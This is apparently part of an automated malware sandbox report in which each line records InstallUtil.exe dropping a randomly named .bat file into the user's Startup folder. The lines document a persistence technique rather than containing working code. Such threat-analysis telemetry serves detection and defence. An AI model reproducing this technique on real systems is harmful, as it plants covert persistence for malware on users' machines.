                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\L60mOnprETYU8PVSXxv1TKgu.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\N4oRjvZiiIUiuyH7qY2tJVxP.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\tDJLaHZLLtRSKU5ceCcvYzy0.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\rU6sAXL8ShxvNSFxfztITQEO.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cJFsupPdhex8QpEWXObWONd1.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8952IHdifzCOHTQvuvHXTJ1g.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\F2SoYI0VgAOawpvWVdJVVDIM.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d8IR6x2FHYB42LL3QeY8fNCg.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mm7BesjycQWolvzqUxLCJN2V.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mEdWQV0gAnTaAGqJjmojBkRB.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\QKgxCepPfryutV6Yrct1aQ8O.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\nDxlT2zfYNUQnGhPw0ddY3Jk.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ff4HfnvNq5FdWodG1vRYL2NM.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\nz2Ckg7fITBXGmFKoxjG1u00.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ii1KL5uilzCRnH7PuS8IaglH.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OOHyKTaNRs5i380w7sfoSTrE.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\tAqt6IonJ28ek47HWmcHedgJ.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\oOhQXmnGTZctAq7jzm8VemBz.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\2JYRr5VJQzScOorgs63t6Yms.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7XCwIQMtq8JrfsfhMk9tIIOj.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MVSTH2OU1514cyfdjHdKKLX6.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MD3aZCK2o3gddU7wGrkeXuBH.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dqz7fQjdgpBOVOEwVuzrvS7L.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\tpmbygrB8VoHP1SuBe596Iom.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\6dNGtLUaCGiNt5X3GAVfN2mx.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\huKfpDIvxQDlEFuk0ExAiyiY.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EFETrEauohMUCVpzszudURYY.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\rbuXaEpUYfBvSLY1BSq9FAGz.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\tMnW1nNhCxc57ShEccGmAfuc.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\6YVbkJ2dbTU6iPJjmiDFc28v.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pIWBIkjKkw1pyL67X81LlMuW.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7BA8WVult1sLOauGc9twvjXt.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BG4uaPJ9Dk2ZtFkFmXZqJQN5.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\C5bXmg8WFq8GqSN4su9KEIhK.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\lJKdZUxmZnY2NKvxLXDrjSku.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\otmHh8LJXxRmJ6wgqiU2xXNN.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fV1IOv3XzX0dw8cL656hlcGA.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\tpxByPiHTfm0FXRZ9jVXDXqE.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\t848D57sRdga678o3iuE8fs0.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\rVcxREh2h9e98HI2JvGb21V7.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KFn3QrubYABzdRE1O31cNxVg.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\A6JhBFTT0ahcL4Jx3VU57fvL.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\THlJn0bCoJMkwaJJ1damaKHf.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HEiHPMqfTU2BUzEni0ygFieY.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\J3V1pdpFAtBTREkflB9t911H.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\2BAkuvvH6sPJYNmpYSkgEcI5.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\tCfx7C0T7ChpGlE7H15p1O5u.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\gZtCFxlqR0Jhzrk0e43UouaM.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fg8k8vWyqYQx0o1Q7REQB6Y1.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CAjdcCiGIZYnFjRUzQZOkZkX.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dArYapieKDS3mOriXwVea1ZH.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\QYWpTGBqLRZXJWqN9GgXDdj4.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OksJDIkSk9vlxiJRjwqOvBEl.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TtQ59dJ4wCe89DD8HhCLHVsL.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SbQ0yDAjokdr2V5NsofhcXiW.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\e0F2LznfDHjVvc1ZIgjGBTfl.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OeHnvNY8j0wZg74Dxkl5QDpP.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4golg26ok3AkC3sMSeZWrCjO.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RwdyRothHh6h93fgno23ysMA.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Iuq59gPB0g4RDHfNUajlbFgV.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Pc0adCuCUlFy3GCkyGaXGVPu.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DPJLpwNaMsKVDJVgWZDaOfvk.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\kk0tFcBxArqNuZLONVKNccQ9.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\zCp3tcAX5zWepThqbpQcv3Vp.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\QYl1LYI6eLuyjSz20JB30bta.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XyNWXmNEbpbFhVSFSSJ7vqq7.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\nHpplC9DOVhKNIOafnUoxiOu.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\rgr9vKFddOoI510FsaWGwfMd.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fPKannmBo94NforWN8ticios.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\q6S8ZsBC4fHsfjqey8ivFoc0.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mDRxpt9F25D9uZbeaJsspjpJ.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\I3tGceZE6Qqz7aE3jOU5x1I6.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\D2m62fF9GqYbEVP6vD9j2gxn.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UxkTO6SD1uCvL9HjSQh27cQ2.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a9NSv00SQMrlWyCzm4LVScNC.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\wfxQxKS1grbtlbpNfFfWg0ap.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\moEvd4QfiLLNeBPf2fKoDASn.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\asBZ8wuHHDAJRzMiLzRqRpQF.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\296oUdYAJhNvgZMPkFJ8Adyi.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\xvAX15SR7EcYwQ5Q2lE9XfHz.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\6ay5F8eKgrG8lBN1EHxrDj9a.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CTuYRPLN8CgT4PB5QSqLONlo.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c0ucrp3AZ3Gqcb9XOi4ScJgO.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\QrETgkaDo3FkasRFDjM62pwJ.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EzK2ceYSUfPRcBaU9TkNfaTf.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sW90HVv4foncLJ8sPYYq235r.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IzmNdVOYIlxME3DLm9p1Wo8d.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\99X2MvCoXuwU3tttFIPQHwHV.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\5zhgboFgxJ3Uc89yF9kUFaaB.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Z9adfxYPwrNPpZuQpK6e32ji.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HkWShiPP36Gpv4T24kJCvlou.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\myITKbxjJgcKNVboC3VuR9An.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\GPBZ3pTErTY3e9leZcqdjvav.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\15kxO4axYz87tjx2F18yoEOB.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\kYBowvhQTbfkpH7pEHtJjyDD.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0c2kEPMEoB7jKNmSTYgGEhkC.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\zaUcC3Pe1Igei62bzfib2Lgh.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\QxDXJA7Z6xLrsw7t7yKiytsc.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\k6mBzFjd7L6byeC8koGX6zwd.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\H6C8H8atjKBB32y6kz0KwOYz.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\reYWUrsGfXdjd232fVT1vkBW.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\o6vfvXn1v5ljIkA7P0OwmNPJ.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\50beuzNCvSVaMrqSOp6IcdAU.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TSUKSzjiont3ubOypqhhZvXM.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UQssKesI2uliQ7sIfwOvM5n9.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Yo2bOHtMzxxZL1bom4sGHQIE.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\uMHc9fDef8Mu32GWDJP5t5su.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sEO8Bhf0d4Qrw9uimKYvdPbJ.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\gf9K0uVqiu13maxJpiTH6V5K.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\uPpk0o97VYSvo6hjGFH0TQqL.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0IVfGkpQqbTNp1pNVMpRFWtI.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dJvuemiGicObX4Z30kroda9A.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\kvtHxdKcRoDqPC1gLyjQuWO9.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HLY28VSs4EqLmIyqaUOTirim.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WRjwqgtLRilPROuQsr5g5A6Y.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\G8ldCvYSMjZMx5lkoyQ6Gvn2.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\lnNEauUE5ISjaPQmGBOxsDf3.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\l1jIVrUtFS0lwUMqub3ii2o5.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bdNzZw7sNnZozpGAOggzJM47.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\P4cTa1Ex4OzvKUtjHhTKpCVV.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ZD6INkMJGFiYItMqV3k0Ldkd.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0vemidTikN0VMvyyqgfUpM9G.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\JFT0ZMX7h2Vok8FUmP23B4xM.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pYpnQnrOSHLqZa7RxVaX3LWM.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vtZyB8nLuAZWzY9cL759HQik.batJump to dropped file
